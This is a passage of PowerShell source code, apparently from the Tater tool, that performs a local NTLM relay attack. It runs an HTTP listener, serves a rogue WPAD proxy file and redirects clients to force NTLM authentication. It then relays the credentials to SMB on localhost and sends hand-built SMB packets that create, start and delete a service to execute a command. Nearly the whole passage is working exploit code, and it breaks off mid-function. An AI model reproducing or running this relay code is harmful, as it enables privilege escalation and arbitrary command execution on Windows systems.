||
|
|
||
|
3
|
||
|
{
|
||
|
$SMB_relay_execute_send = $SMB_relay_execute_ReadAndRequest
|
||
|
}
|
||
|
|
||
|
4
|
||
|
{
|
||
|
$SMB_relay_execute_send = 0x00,0x00,0x00,0x9b,0xff,0x53,0x4d,0x42,0x2f,0x00,0x00,0x00,0x00,
|
||
|
0x18,0x05,0x28,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
|
||
|
0x00,0x00,0x00,0x08 +
|
||
|
$tater.process_ID_bytes +
|
||
|
$SMB_user_ID +
|
||
|
0x06,0x00,0x0e,0xff,0x00,0x00,0x00,0x00,0x40,0xea,0x03,0x00,0x00,
|
||
|
0xff,0xff,0xff,0xff,0x08,0x00,0x50,0x00,0x00,0x00,0x5c,0x00,0x3f,
|
||
|
0x00,0x00,0x00,0x00,0x00,0x5c,0x00,0x05,0x00,0x00,0x03,0x10,0x00,
|
||
|
0x00,0x00,0x5c,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x38,0x00,0x00,
|
||
|
0x00,0x00,0x00,0x0f,0x00,0x00,0x00,0x03,0x00,0x15,0x00,0x00,0x00,
|
||
|
0x00,0x00,0x00,0x00,0x15,0x00,0x00,0x00 +
|
||
|
$SMB_service_bytes +
|
||
|
0x00,0x00,0x00,0x00,0x00,0x00,0x3f,0x00,0x0f,0x00
|
||
|
|
||
|
$SMB_multiplex_id = 0x07
|
||
|
}
|
||
|
|
||
|
5
|
||
|
{
|
||
|
$SMB_relay_execute_send = $SMB_relay_execute_ReadAndRequest
|
||
|
}
|
||
|
|
||
|
6
|
||
|
{
|
||
|
$SMB_relay_execute_send = [Array]0x00 +
|
||
|
$SMB_service_data_length_bytes +
|
||
|
0xff,0x53,0x4d,0x42,0x2f,0x00,0x00,0x00,0x00,0x18,0x05,0x28,0x00,
|
||
|
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x08 +
|
||
|
$tater.process_ID_bytes +
|
||
|
$SMB_user_ID +
|
||
|
0x08,0x00,0x0e,0xff,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x00,
|
||
|
0xff,0xff,0xff,0xff,0x08,0x00 +
|
||
|
$SMB_service_byte_count_bytes +
|
||
|
0x00,0x00 +
|
||
|
$SMB_service_byte_count_bytes +
|
||
|
0x3f,0x00,0x00,0x00,0x00,0x00 +
|
||
|
$SMB_service_byte_count_bytes +
|
||
|
0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00 +
|
||
|
$SMB_service_byte_count_bytes +
|
||
|
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0c,
|
||
|
0x00 +
|
||
|
$SMB_context_handler +
|
||
|
0x15,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x15,0x00,0x00,0x00 +
|
||
|
$SMB_service_bytes +
|
||
|
0x00,0x00 +
|
||
|
$SMB_referent_ID_bytes +
|
||
|
0x15,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x15,0x00,0x00,0x00 +
|
||
|
$SMB_service_bytes +
|
||
|
0x00,0x00,0xff,0x01,0x0f,0x00,0x10,0x01,0x00,0x00,0x03,0x00,0x00,
|
||
|
0x00,0x00,0x00,0x00,0x00 +
|
||
|
$SMB_relay_command_length_bytes +
|
||
|
0x00,0x00,0x00,0x00 +
|
||
|
$SMB_relay_command_length_bytes +
|
||
|
$SMB_relay_command_bytes +
|
||
|
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
|
||
|
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
|
||
|
0x00,0x00
|
||
|
|
||
|
$SMB_multiplex_id = 0x09
|
||
|
}
|
||
|
|
||
|
7
|
||
|
{
|
||
|
$SMB_relay_execute_send = $SMB_relay_execute_ReadAndRequest
|
||
|
}
|
||
|
|
||
|
8
|
||
|
{
|
||
|
$SMB_relay_execute_send = 0x00,0x00,0x00,0x73,0xff,0x53,0x4d,0x42,0x2f,0x00,0x00,0x00,0x00,
|
||
|
0x18,0x05,0x28,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
|
||
|
0x00,0x00,0x00,0x08 +
|
||
|
$tater.process_ID_bytes +
|
||
|
$SMB_user_ID +
|
||
|
0x0a,0x00,0x0e,0xff,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x00,
|
||
|
0xff,0xff,0xff,0xff,0x08,0x00,0x34,0x00,0x00,0x00,0x34,0x00,0x3f,
|
||
|
0x00,0x00,0x00,0x00,0x00,0x34,0x00,0x05,0x00,0x00,0x03,0x10,0x00,
|
||
|
0x00,0x00,0x34,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x1c,0x00,0x00,
|
||
|
0x00,0x00,0x00,0x13,0x00 +
|
||
|
$SMB_context_handler +
|
||
|
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
|
||
|
}
|
||
|
|
||
|
9
|
||
|
{
|
||
|
$SMB_relay_execute_send = $SMB_relay_execute_ReadAndRequest
|
||
|
}
|
||
|
|
||
|
10
|
||
|
{
|
||
|
$SMB_relay_execute_send = 0x00,0x00,0x00,0x6b,0xff,0x53,0x4d,0x42,0x2f,0x00,0x00,0x00,0x00,
|
||
|
0x18,0x05,0x28,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
|
||
|
0x00,0x00,0x00,0x08 +
|
||
|
$tater.process_ID_bytes +
|
||
|
$SMB_user_ID +
|
||
|
0x0b,0x00,0x0e,0xff,0x00,0x00,0x00,0x00,0x40,0x0b,0x01,0x00,0x00,
|
||
|
0xff,0xff,0xff,0xff,0x08,0x00,0x2c,0x00,0x00,0x00,0x2c,0x00,0x3f,
|
||
|
0x00,0x00,0x00,0x00,0x00,0x2c,0x00,0x05,0x00,0x00,0x03,0x10,0x00,
|
||
|
0x00,0x00,0x2c,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x14,0x00,0x00,
|
||
|
0x00,0x00,0x00,0x02,0x00 +
|
||
|
$SMB_context_handler
|
||
|
}
|
||
|
|
||
|
11
|
||
|
{
|
||
|
$SMB_relay_execute_send = $SMB_relay_execute_ReadAndRequest
|
||
|
}
|
||
|
|
||
|
}
|
||
|
|
||
|
$SMB_relay_execute_stream.Write($SMB_relay_execute_send,0,$SMB_relay_execute_send.Length)
|
||
|
$SMB_relay_execute_stream.Flush()
|
||
|
|
||
|
if ($k -eq 5)
|
||
|
{
|
||
|
$SMB_relay_execute_stream.Read($SMB_relay_execute_bytes,0,$SMB_relay_execute_bytes.Length)
|
||
|
$SMB_context_handler = $SMB_relay_execute_bytes[88..107]
|
||
|
|
||
|
if(([System.BitConverter]::ToString($SMB_relay_execute_bytes[108..111]) -eq '00-00-00-00') -and ([System.BitConverter]::ToString($SMB_context_handler) -ne '00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00'))
|
||
|
{
|
||
|
#$tater.console_queue.Add("$(Get-Date -format 's') - $HTTP_NTLM_domain_string\" + "$HTTP_NTLM_user_string is a local administrator on $SMBRelayTarget")
|
||
|
}
|
||
|
elseif([System.BitConverter]::ToString($SMB_relay_execute_bytes[108..111]) -eq '05-00-00-00')
|
||
|
{
|
||
|
$tater.console_queue.Add("$(Get-Date -format 's') - $HTTP_NTLM_domain_string\" + "$HTTP_NTLM_user_string is not a local administrator on " + "$SMBRelayTarget")
|
||
|
$SMB_relay_failed = $true
|
||
|
}
|
||
|
else
|
||
|
{
|
||
|
$SMB_relay_failed = $true
|
||
|
}
|
||
|
|
||
|
|
||
|
}
|
||
|
elseif ($k -eq 7 -or $k -eq 9 -or $k -eq 11)
|
||
|
{
|
||
|
$SMB_relay_execute_stream.Read($SMB_relay_execute_bytes,0,$SMB_relay_execute_bytes.Length)
|
||
|
|
||
|
switch($k)
|
||
|
{
|
||
|
|
||
|
7 {
|
||
|
$SMB_context_handler = $SMB_relay_execute_bytes[92..111]
|
||
|
$SMB_relay_execute_error_message = "Service creation fault context mismatch"
|
||
|
}
|
||
|
|
||
|
11 {
|
||
|
$SMB_relay_execute_error_message = "Service start fault context mismatch"
|
||
|
}
|
||
|
|
||
|
13 {
|
||
|
$SMB_relay_execute_error_message = "Service deletion fault context mismatch"
|
||
|
}
|
||
|
|
||
|
}
|
||
|
|
||
|
if([System.BitConverter]::ToString($SMB_context_handler[0..3]) -ne '00-00-00-00')
|
||
|
{
|
||
|
$SMB_relay_failed = $true
|
||
|
}
|
||
|
|
||
|
if([System.BitConverter]::ToString($SMB_relay_execute_bytes[88..91]) -eq '1a-00-00-1c')
|
||
|
{
|
||
|
$tater.console_queue.Add("$SMB_relay_execute_error_message service on $SMBRelayTarget")
|
||
|
$SMB_relay_failed = $true
|
||
|
}
|
||
|
|
||
|
}
|
||
|
else
|
||
|
{
|
||
|
$SMB_relay_execute_stream.Read($SMB_relay_execute_bytes,0,$SMB_relay_execute_bytes.Length)
|
||
|
}
|
||
|
|
||
|
if(!$SMB_relay_failed -and $k -eq 7)
|
||
|
{
|
||
|
$tater.console_queue.Add("$(Get-Date -format 's') - SMB relay service $SMB_service created on $SMBRelayTarget")
|
||
|
}
|
||
|
elseif(!$SMB_relay_failed -and $k -eq 9)
|
||
|
{
|
||
|
$tater.console_queue.Add("$(Get-Date -format 's') - Command likely executed on $SMBRelayTarget")
|
||
|
}
|
||
|
elseif(!$SMB_relay_failed -and $k -eq 11)
|
||
|
{
|
||
|
$tater.console_queue.Add("$(Get-Date -format 's') - SMB relay service $SMB_service deleted on $SMBRelayTarget")
|
||
|
}
|
||
|
|
||
|
$SMB_relay_execute_ReadAndRequest = 0x00,0x00,0x00,0x37,0xff,0x53,0x4d,0x42,0x2e,0x00,0x00,0x00,0x00,
|
||
|
0x18,0x05,0x28,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
|
||
|
0x00,0x00,0x00,0x08 +
|
||
|
$tater.process_ID_bytes +
|
||
|
$SMB_user_ID +
|
||
|
$SMB_multiplex_ID +
|
||
|
0x00,0x0a,0xff,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x00,0x58,
|
||
|
0x02,0x58,0x02,0xff,0xff,0xff,0xff,0x00,0x00,0x00,0x00
|
||
|
|
||
|
if($SMB_relay_failed)
|
||
|
{
|
||
|
$tater.console_queue.Add("$(Get-Date -format 's') - SMB relay failed on $SMBRelayTarget")
|
||
|
BREAK SMB_relay_execute_loop
|
||
|
}
|
||
|
|
||
|
$k++
|
||
|
|
||
|
}
|
||
|
|
||
|
$tater.SMB_relay_active_step = 0
|
||
|
|
||
|
$SMB_relay_socket.Close()
|
||
|
|
||
|
if(!$SMB_relay_failed)
|
||
|
{
|
||
|
$tater.SMBRelay_success = $True
|
||
|
}
|
||
|
|
||
|
}
|
||
|
|
||
|
}
|
||
|
|
||
|
# HTTP Server ScriptBlock - HTTP listener
|
||
|
$HTTP_scriptblock =
|
||
|
{
|
||
|
param ($Command,$HTTPPort,$WPADDirectHosts,$WPADPort)
|
||
|
|
||
|
function NTLMChallengeBase64
|
||
|
{
|
||
|
$HTTP_timestamp = Get-Date
|
||
|
$HTTP_timestamp = $HTTP_timestamp.ToFileTime()
|
||
|
$HTTP_timestamp = [System.BitConverter]::ToString([System.BitConverter]::GetBytes($HTTP_timestamp))
|
||
|
$HTTP_timestamp = $HTTP_timestamp.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
|
||
|
|
||
|
$HTTP_NTLM_bytes = 0x4e,0x54,0x4c,0x4d,0x53,0x53,0x50,0x00,0x02,0x00,0x00,0x00,0x06,0x00,0x06,0x00,0x38,
|
||
|
0x00,0x00,0x00,0x05,0xc2,0x89,0xa2 +
|
||
|
$HTTP_challenge_bytes +
|
||
|
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x82,0x00,0x82,0x00,0x3e,0x00,0x00,0x00,0x06,
|
||
|
0x01,0xb1,0x1d,0x00,0x00,0x00,0x0f,0x4c,0x00,0x41,0x00,0x42,0x00,0x02,0x00,0x06,0x00,
|
||
|
0x4c,0x00,0x41,0x00,0x42,0x00,0x01,0x00,0x10,0x00,0x48,0x00,0x4f,0x00,0x53,0x00,0x54,
|
||
|
0x00,0x4e,0x00,0x41,0x00,0x4d,0x00,0x45,0x00,0x04,0x00,0x12,0x00,0x6c,0x00,0x61,0x00,
|
||
|
0x62,0x00,0x2e,0x00,0x6c,0x00,0x6f,0x00,0x63,0x00,0x61,0x00,0x6c,0x00,0x03,0x00,0x24,
|
||
|
0x00,0x68,0x00,0x6f,0x00,0x73,0x00,0x74,0x00,0x6e,0x00,0x61,0x00,0x6d,0x00,0x65,0x00,
|
||
|
0x2e,0x00,0x6c,0x00,0x61,0x00,0x62,0x00,0x2e,0x00,0x6c,0x00,0x6f,0x00,0x63,0x00,0x61,
|
||
|
0x00,0x6c,0x00,0x05,0x00,0x12,0x00,0x6c,0x00,0x61,0x00,0x62,0x00,0x2e,0x00,0x6c,0x00,
|
||
|
0x6f,0x00,0x63,0x00,0x61,0x00,0x6c,0x00,0x07,0x00,0x08,0x00 +
|
||
|
$HTTP_timestamp +
|
||
|
0x00,0x00,0x00,0x00,0x0a,0x0a
|
||
|
|
||
|
$NTLM_challenge_base64 = [System.Convert]::ToBase64String($HTTP_NTLM_bytes)
|
||
|
$NTLM = 'NTLM ' + $NTLM_challenge_base64
|
||
|
$NTLM_challenge = $HTTP_challenge
|
||
|
|
||
|
return $NTLM
|
||
|
}
|
||
|
|
||
|
$SMBRelayTarget = "127.0.0.1"
|
||
|
$HTTP_port_bytes = [System.Text.Encoding]::UTF8.GetBytes($HTTPPort)
|
||
|
$WPADDirectHosts += "localhost"
|
||
|
$HTTP_content_length = $WPADPort.Length + 62
|
||
|
|
||
|
foreach($WPAD_direct_host in $WPADDirectHosts)
|
||
|
{
|
||
|
$HTTP_content_length += $WPAD_direct_host.Length + 43
|
||
|
$HTTP_content_length_bytes = [System.Text.Encoding]::UTF8.GetBytes($HTTP_content_length)
|
||
|
$WPAD_direct_host_bytes = [System.Text.Encoding]::UTF8.GetBytes($WPAD_direct_host)
|
||
|
|
||
|
$WPAD_direct_host_function_bytes = 0x69,0x66,0x20,0x28,0x64,0x6e,0x73,0x44,0x6f,0x6d,0x61,0x69,0x6e,0x49,
|
||
|
0x73,0x28,0x68,0x6f,0x73,0x74,0x2c,0x20,0x22 +
|
||
|
$WPAD_direct_host_bytes +
|
||
|
0x22,0x29,0x29,0x20,0x72,0x65,0x74,0x75,0x72,0x6e,0x20,0x22,0x44,0x49,
|
||
|
0x52,0x45,0x43,0x54,0x22,0x3b
|
||
|
|
||
|
$WPAD_direct_hosts_bytes += $WPAD_direct_host_function_bytes
|
||
|
}
|
||
|
|
||
|
$WPAD_port_bytes = [System.Text.Encoding]::UTF8.GetBytes($WPADPort)
|
||
|
|
||
|
:HTTP_listener_loop while ($tater.running)
|
||
|
{
|
||
|
|
||
|
if($tater.SMBRelay_success)
|
||
|
{
|
||
|
StopTater
|
||
|
}
|
||
|
|
||
|
$TCP_request = $NULL
|
||
|
$TCP_request_bytes = New-Object System.Byte[] 1024
|
||
|
$suppress_waiting_message = $false
|
||
|
|
||
|
while(!$tater.HTTP_listener.Pending() -and !$tater.HTTP_client.Connected)
|
||
|
{
|
||
|
|
||
|
if(!$suppress_waiting_message)
|
||
|
{
|
||
|
$tater.console_queue.Add("$(Get-Date -format 's') - Waiting for incoming HTTP connection")
|
||
|
$suppress_waiting_message = $true
|
||
|
}
|
||
|
|
||
|
Start-Sleep -s 1
|
||
|
|
||
|
if($tater.SMBRelay_success)
|
||
|
{
|
||
|
StopTater
|
||
|
}
|
||
|
|
||
|
}
|
||
|
|
||
|
if(!$tater.HTTP_client.Connected)
|
||
|
{
|
||
|
$tater.HTTP_client = $tater.HTTP_listener.AcceptTcpClient()
|
||
|
$HTTP_stream = $tater.HTTP_client.GetStream()
|
||
|
}
|
||
|
|
||
|
while ($HTTP_stream.DataAvailable)
|
||
|
{
|
||
|
$HTTP_stream.Read($TCP_request_bytes,0,$TCP_request_bytes.Length)
|
||
|
}
|
||
|
|
||
|
$TCP_request = [System.BitConverter]::ToString($TCP_request_bytes)
|
||
|
|
||
|
if($TCP_request -like "47-45-54-20*" -or $TCP_request -like "48-45-41-44-20*" -or $TCP_request -like "4f-50-54-49-4f-4e-53-20*")
|
||
|
{
|
||
|
$HTTP_raw_URL = $TCP_request.Substring($TCP_request.IndexOf("-20-") + 4,$TCP_request.Substring($TCP_request.IndexOf("-20-") + 1).IndexOf("-20-") - 3)
|
||
|
$HTTP_raw_URL = $HTTP_raw_URL.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
|
||
|
$tater.request_RawUrl = New-Object System.String ($HTTP_raw_URL,0,$HTTP_raw_URL.Length)
|
||
|
|
||
|
if($tater.request_RawUrl -eq "")
|
||
|
{
|
||
|
$tater.request_RawUrl = "/"
|
||
|
}
|
||
|
|
||
|
}
|
||
|
|
||
|
if($TCP_request -like "*-41-75-74-68-6F-72-69-7A-61-74-69-6F-6E-3A-20-*")
|
||
|
{
|
||
|
$HTTP_authorization_header = $TCP_request.Substring($TCP_request.IndexOf("-41-75-74-68-6F-72-69-7A-61-74-69-6F-6E-3A-20-") + 46)
|
||
|
$HTTP_authorization_header = $HTTP_authorization_header.Substring(0,$HTTP_authorization_header.IndexOf("-0D-0A-"))
|
||
|
$HTTP_authorization_header = $HTTP_authorization_header.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
|
||
|
$authentication_header = New-Object System.String ($HTTP_authorization_header,0,$HTTP_authorization_header.Length)
|
||
|
}
|
||
|
else
|
||
|
{
|
||
|
$authentication_header = ''
|
||
|
}
|
||
|
|
||
|
$HTTP_type = "HTTP"
|
||
|
$HTTP_request_type = ""
|
||
|
|
||
|
if ($tater.request_RawUrl -match '/wpad.dat')
|
||
|
{
|
||
|
$tater.response_StatusCode = 0x32,0x30,0x30
|
||
|
$HTTP_response_phrase = 0x4f,0x4b
|
||
|
|
||
|
$HTTP_WPAD_response = 0x66,0x75,0x6e,0x63,0x74,0x69,0x6f,0x6e,0x20,0x46,0x69,0x6e,0x64,0x50,0x72,
|
||
|
0x6f,0x78,0x79,0x46,0x6f,0x72,0x55,0x52,0x4c,0x28,0x75,0x72,0x6c,0x2c,0x68,
|
||
|
0x6f,0x73,0x74,0x29,0x7b +
|
||
|
$WPAD_direct_hosts_bytes +
|
||
|
0x72,0x65,0x74,0x75,0x72,0x6e,0x20,0x22,0x50,0x52,0x4f,0x58,0x59,0x20,0x31,
|
||
|
0x32,0x37,0x2e,0x30,0x2e,0x30,0x2e,0x31,0x3a +
|
||
|
$WPAD_port_bytes +
|
||
|
0x22,0x3b,0x7d
|
||
|
|
||
|
$NTLM = ''
|
||
|
$HTTP_request_type = "WPAD"
|
||
|
}
|
||
|
elseif ($tater.request_RawUrl -eq '/GETHASHES')
|
||
|
{
|
||
|
$tater.response_StatusCode = 0x34,0x30,0x31
|
||
|
$HTTP_response_phrase = 0x4f,0x4b
|
||
|
$NTLM = 'NTLM'
|
||
|
$HTTP_request_type = "NTLM"
|
||
|
}
|
||
|
else
|
||
|
{
|
||
|
$tater.response_StatusCode = 0x33,0x30,0x32
|
||
|
|
||
|
$HTTP_location = 0x43,0x61,0x63,0x68,0x65,0x2d,0x43,0x6f,0x6e,0x74,0x72,0x6f,0x6c,0x3a,0x20,0x70,0x72,
|
||
|
0x69,0x76,0x61,0x74,0x65,0x0d,0x0a,0x43,0x6f,0x6e,0x74,0x65,0x6e,0x74,0x2d,0x54,0x79,
|
||
|
0x70,0x65,0x3a,0x20,0x74,0x65,0x78,0x74,0x2f,0x68,0x74,0x6d,0x6c,0x3b,0x20,0x63,0x68,
|
||
|
0x61,0x72,0x73,0x65,0x74,0x3d,0x75,0x74,0x66,0x2d,0x38,0x0d,0x0a,0x45,0x78,0x70,0x69,
|
||
|
0x72,0x65,0x73,0x3a,0x20,0x4d,0x6f,0x6e,0x2c,0x20,0x30,0x31,0x20,0x4a,0x61,0x6e,0x20,
|
||
|
0x30,0x30,0x30,0x31,0x20,0x30,0x30,0x3a,0x30,0x30,0x3a,0x30,0x30,0x20,0x47,0x4d,0x54,
|
||
|
0x0d,0x0a,0x4c,0x6f,0x63,0x61,0x74,0x69,0x6f,0x6e,0x3a,0x20,0x68,0x74,0x74,0x70,0x3a,
|
||
|
0x2f,0x2f,0x6c,0x6f,0x63,0x61,0x6c,0x68,0x6f,0x73,0x74,0x3a +
|
||
|
$HTTP_port_bytes +
|
||
|
0x2f,0x47,0x45,0x54,0x48,0x41,0x53,0x48,0x45,0x53,0x0d,0x0a
|
||
|
|
||
|
$HTTP_response_phrase = 0x4f,0x4b
|
||
|
$NTLM = ''
|
||
|
$HTTP_request_type = "Redirect"
|
||
|
|
||
|
if($tater.HTTP_client_handle_old -ne $tater.HTTP_client.Client.Handle)
|
||
|
{
|
||
|
$tater.console_queue.Add("$(Get-Date -format 's') - Attempting to redirect to http://localhost:" + "$HTTPPort/gethashes and trigger relay")
|
||
|
}
|
||
|
|
||
|
}
|
||
|
|
||
|
if(($tater.request_RawUrl_old -ne $tater.request_RawUrl -and $tater.HTTP_client_handle_old -ne $tater.HTTP_client.Client.Handle) -or $tater.HTTP_client_handle_old -ne $tater.HTTP_client.Client.Handle)
|
||
|
{
|
||
|
$tater.console_queue.Add("$(Get-Date -format 's') - $HTTP_type request for " + $tater.request_RawUrl + " received from " + $tater.HTTP_client.Client.RemoteEndpoint.Address)
|
||
|
}
|
||
|
|
||
|
if($authentication_header.StartsWith('NTLM '))
|
||
|
{
|
||
|
$authentication_header = $authentication_header -replace 'NTLM ',''
|
||
|
[byte[]] $HTTP_request_bytes = [System.Convert]::FromBase64String($authentication_header)
|
||
|
$tater.response_StatusCode = 0x34,0x30,0x31
|
||
|
$HTTP_response_phrase = 0x4f,0x4b
|
||
|
|
||
|
if ($HTTP_request_bytes[8] -eq 1)
|
||
|
{
|
||
|
|
||
|
if($tater.SMB_relay_active_step -eq 0)
|
||
|
{
|
||
|
$tater.SMB_relay_active_step = 1
|
||
|
$tater.console_queue.Add("$(Get-Date -format 's') - $HTTP_type to SMB relay triggered by " + $tater.HTTP_client.Client.RemoteEndpoint.Address)
|
||
|
$tater.console_queue.Add("$(Get-Date -format 's') - Grabbing challenge for relay from " + "$SMBRelayTarget")
|
||
|
$SMB_relay_socket = New-Object System.Net.Sockets.TCPClient
|
||
|
$SMB_relay_socket.connect($SMBRelayTarget,"445")
|
||
|
|
||
|
if(!$SMB_relay_socket.connected)
|
||
|
{
|
||
|
$tater.console_queue.Add("$(Get-Date -format 's') - SMB relay target is not responding")
|
||
|
$tater.SMB_relay_active_step = 0
|
||
|
}
|
||
|
|
||
|
if($tater.SMB_relay_active_step -eq 1)
|
||
|
{
|
||
|
$SMB_relay_bytes = SMBRelayChallenge $SMB_relay_socket $HTTP_request_bytes
|
||
|
$tater.SMB_relay_active_step = 2
|
||
|
$SMB_relay_bytes = $SMB_relay_bytes[2..$SMB_relay_bytes.Length]
|
||
|
$SMB_user_ID = $SMB_relay_bytes[34..33]
|
||
|
$SMB_relay_NTLMSSP = [System.BitConverter]::ToString($SMB_relay_bytes)
|
||
|
$SMB_relay_NTLMSSP = $SMB_relay_NTLMSSP -replace "-",""
|
||
|
$SMB_relay_NTLMSSP_index = $SMB_relay_NTLMSSP.IndexOf("4E544C4D53535000")
|
||
|
$SMB_relay_NTLMSSP_bytes_index = $SMB_relay_NTLMSSP_index / 2
|
||
|
$SMB_domain_length = DataLength ($SMB_relay_NTLMSSP_bytes_index + 12) $SMB_relay_bytes
|
||
|
$SMB_domain_length_offset_bytes = $SMB_relay_bytes[($SMB_relay_NTLMSSP_bytes_index + 12)..($SMB_relay_NTLMSSP_bytes_index + 19)]
|
||
|
$SMB_target_length = DataLength ($SMB_relay_NTLMSSP_bytes_index + 40) $SMB_relay_bytes
|
||
|
$SMB_target_length_offset_bytes = $SMB_relay_bytes[($SMB_relay_NTLMSSP_bytes_index + 40)..($SMB_relay_NTLMSSP_bytes_index + 55 + $SMB_domain_length)]
|
||
|
$SMB_relay_NTLM_challenge = $SMB_relay_bytes[($SMB_relay_NTLMSSP_bytes_index + 24)..($SMB_relay_NTLMSSP_bytes_index + 31)]
|
||
|
$SMB_reserved = $SMB_relay_bytes[($SMB_relay_NTLMSSP_bytes_index + 32)..($SMB_relay_NTLMSSP_bytes_index + 39)]
|
||
|
$SMB_relay_target_details = $SMB_relay_bytes[($SMB_relay_NTLMSSP_bytes_index + 56 + $SMB_domain_length)..($SMB_relay_NTLMSSP_bytes_index + 55 + $SMB_domain_length + $SMB_target_length)]
|
||
|
|
||
|
$HTTP_NTLM_bytes = 0x4e,0x54,0x4c,0x4d,0x53,0x53,0x50,0x00,0x02,0x00,0x00,0x00 +
|
||
|
$SMB_domain_length_offset_bytes +
|
||
|
0x05,0xc2,0x89,0xa2 +
|
||
|
$SMB_relay_NTLM_challenge +
|
||
|
$SMB_reserved +
|
||
|
$SMB_target_length_offset_bytes +
|
||
|
$SMB_relay_target_details
|
||
|
|
||
|
$NTLM_challenge_base64 = [System.Convert]::ToBase64String($HTTP_NTLM_bytes)
|
||
|
$NTLM = 'NTLM ' + $NTLM_challenge_base64
|
||
|
$NTLM_challenge = SMBNTLMChallenge $SMB_relay_bytes
|
||
|
$tater.HTTP_challenge_queue.Add($tater.HTTP_client.Client.RemoteEndpoint.Address.IPAddressToString + $tater.HTTP_client.Client.RemoteEndpoint.Port + ',' + $NTLM_challenge)
|
||
|
$tater.console_queue.Add("$(Get-Date -format 's') - Received challenge $NTLM_challenge " + "for relay from $SMBRelayTarget")
|
||
|
$tater.console_queue.Add("$(Get-Date -format 's') - Providing challenge " + "$NTLM_challenge for relay to " + $tater.HTTP_client.Client.RemoteEndpoint.Address)
|
||
|
$tater.SMB_relay_active_step = 3
|
||
|
}
|
||
|
else
|
||
|
{
|
||
|
$NTLM = NTLMChallengeBase64
|
||
|
}
|
||
|
|
||
|
}
|
||
|
else
|
||
|
{
|
||
|
$NTLM = NTLMChallengeBase64
|
||
|
}
|
||
|
|
||
|
$tater.response_StatusCode = 0x34,0x30,0x31
|
||
|
$HTTP_response_phrase = 0x4f,0x4b
|
||
|
|
||
|
}
|
||
|
elseif ($HTTP_request_bytes[8] -eq 3)
|
||
|
{
|
||
|
$NTLM = 'NTLM'
|
||
|
$HTTP_NTLM_offset = $HTTP_request_bytes[24]
|
||
|
$HTTP_NTLM_length = DataLength 22 $HTTP_request_bytes
|
||
|
$HTTP_NTLM_domain_length = DataLength 28 $HTTP_request_bytes
|
||
|
$HTTP_NTLM_domain_offset = DataLength 32 $HTTP_request_bytes
|
||
|
|
||
|
if($HTTP_NTLM_domain_length -eq 0)
|
||
|
{
|
||
|
$HTTP_NTLM_domain_string = ''
|
||
|
}
|
||
|
else
|
||
|
{
|
||
|
$HTTP_NTLM_domain_string = DataToString $HTTP_NTLM_domain_length 0 0 $HTTP_NTLM_domain_offset $HTTP_request_bytes
|
||
|
}
|
||
|
|
||
|
$HTTP_NTLM_user_length = DataLength 36 $HTTP_request_bytes
|
||
|
$HTTP_NTLM_host_length = DataLength 44 $HTTP_request_bytes
|
||
|
|
||
|
if ([System.BitConverter]::ToString($HTTP_request_bytes[16]) -eq '58' -and [System.BitConverter]::ToString($HTTP_request_bytes[24]) -eq '58' -and [System.BitConverter]::ToString($HTTP_request_bytes[32]) -eq '58')
|
||
|
{
|
||
|
$HTTP_NTLM_user_string = ''
|
||
|
$HTTP_NTLM_host_string = ''
|
||
|
}
|
||
|
else
|
||
|
{
|
||
|
$HTTP_NTLM_user_string = DataToString $HTTP_NTLM_user_length $HTTP_NTLM_domain_length 0 $HTTP_NTLM_domain_offset $HTTP_request_bytes
|
||
|
$HTTP_NTLM_host_string = DataToString $HTTP_NTLM_host_length $HTTP_NTLM_domain_length $HTTP_NTLM_user_length $HTTP_NTLM_domain_offset $HTTP_request_bytes
|
||
|
}
|
||
|
|
||
|
$NTLM_response = [System.BitConverter]::ToString($HTTP_request_bytes[$HTTP_NTLM_offset..($HTTP_NTLM_offset + $HTTP_NTLM_length)]) -replace "-",""
|
||
|
$NTLM_response = $NTLM_response.Insert(32,':')
|
||
|
$tater.response_StatusCode = 0x32,0x30,0x30
|
||
|
$HTTP_response_phrase = 0x4f,0x4b
|
||
|
$NTLM_challenge = ''
|
||
|
|
||
|
if ($tater.SMB_relay_active_step -eq 3)
|
||
|
{
|
||
|
$tater.console_queue.Add("$(Get-Date -format 's') - Sending response for " + "$HTTP_NTLM_domain_string\$HTTP_NTLM_user_string for relay to " + "$SMBRelaytarget")
|
||
|
$SMB_relay_response_return_bytes = SMBRelayResponse $SMB_relay_socket $HTTP_request_bytes $SMB_user_ID
|
||
|
$SMB_relay_response_return_bytes = $SMB_relay_response_return_bytes[1..$SMB_relay_response_return_bytes.Length]
|
||
|
|
||
|
if(!$SMB_relay_failed -and [System.BitConverter]::ToString($SMB_relay_response_return_bytes[9..12]) -eq ('00-00-00-00'))
|
||
|
{
|
||
|
$tater.console_queue.Add("$(Get-Date -format 's') - $HTTP_type to SMB relay " + "authentication successful for $HTTP_NTLM_domain_string\" + "$HTTP_NTLM_user_string on $SMBRelayTarget")
|
||
|
$tater.SMB_relay_active_step = 4
|
||
|
SMBRelayExecute $SMB_relay_socket $SMB_user_ID
|
||
|
}
|
||
|
else
|
||
|
{
|
||
|
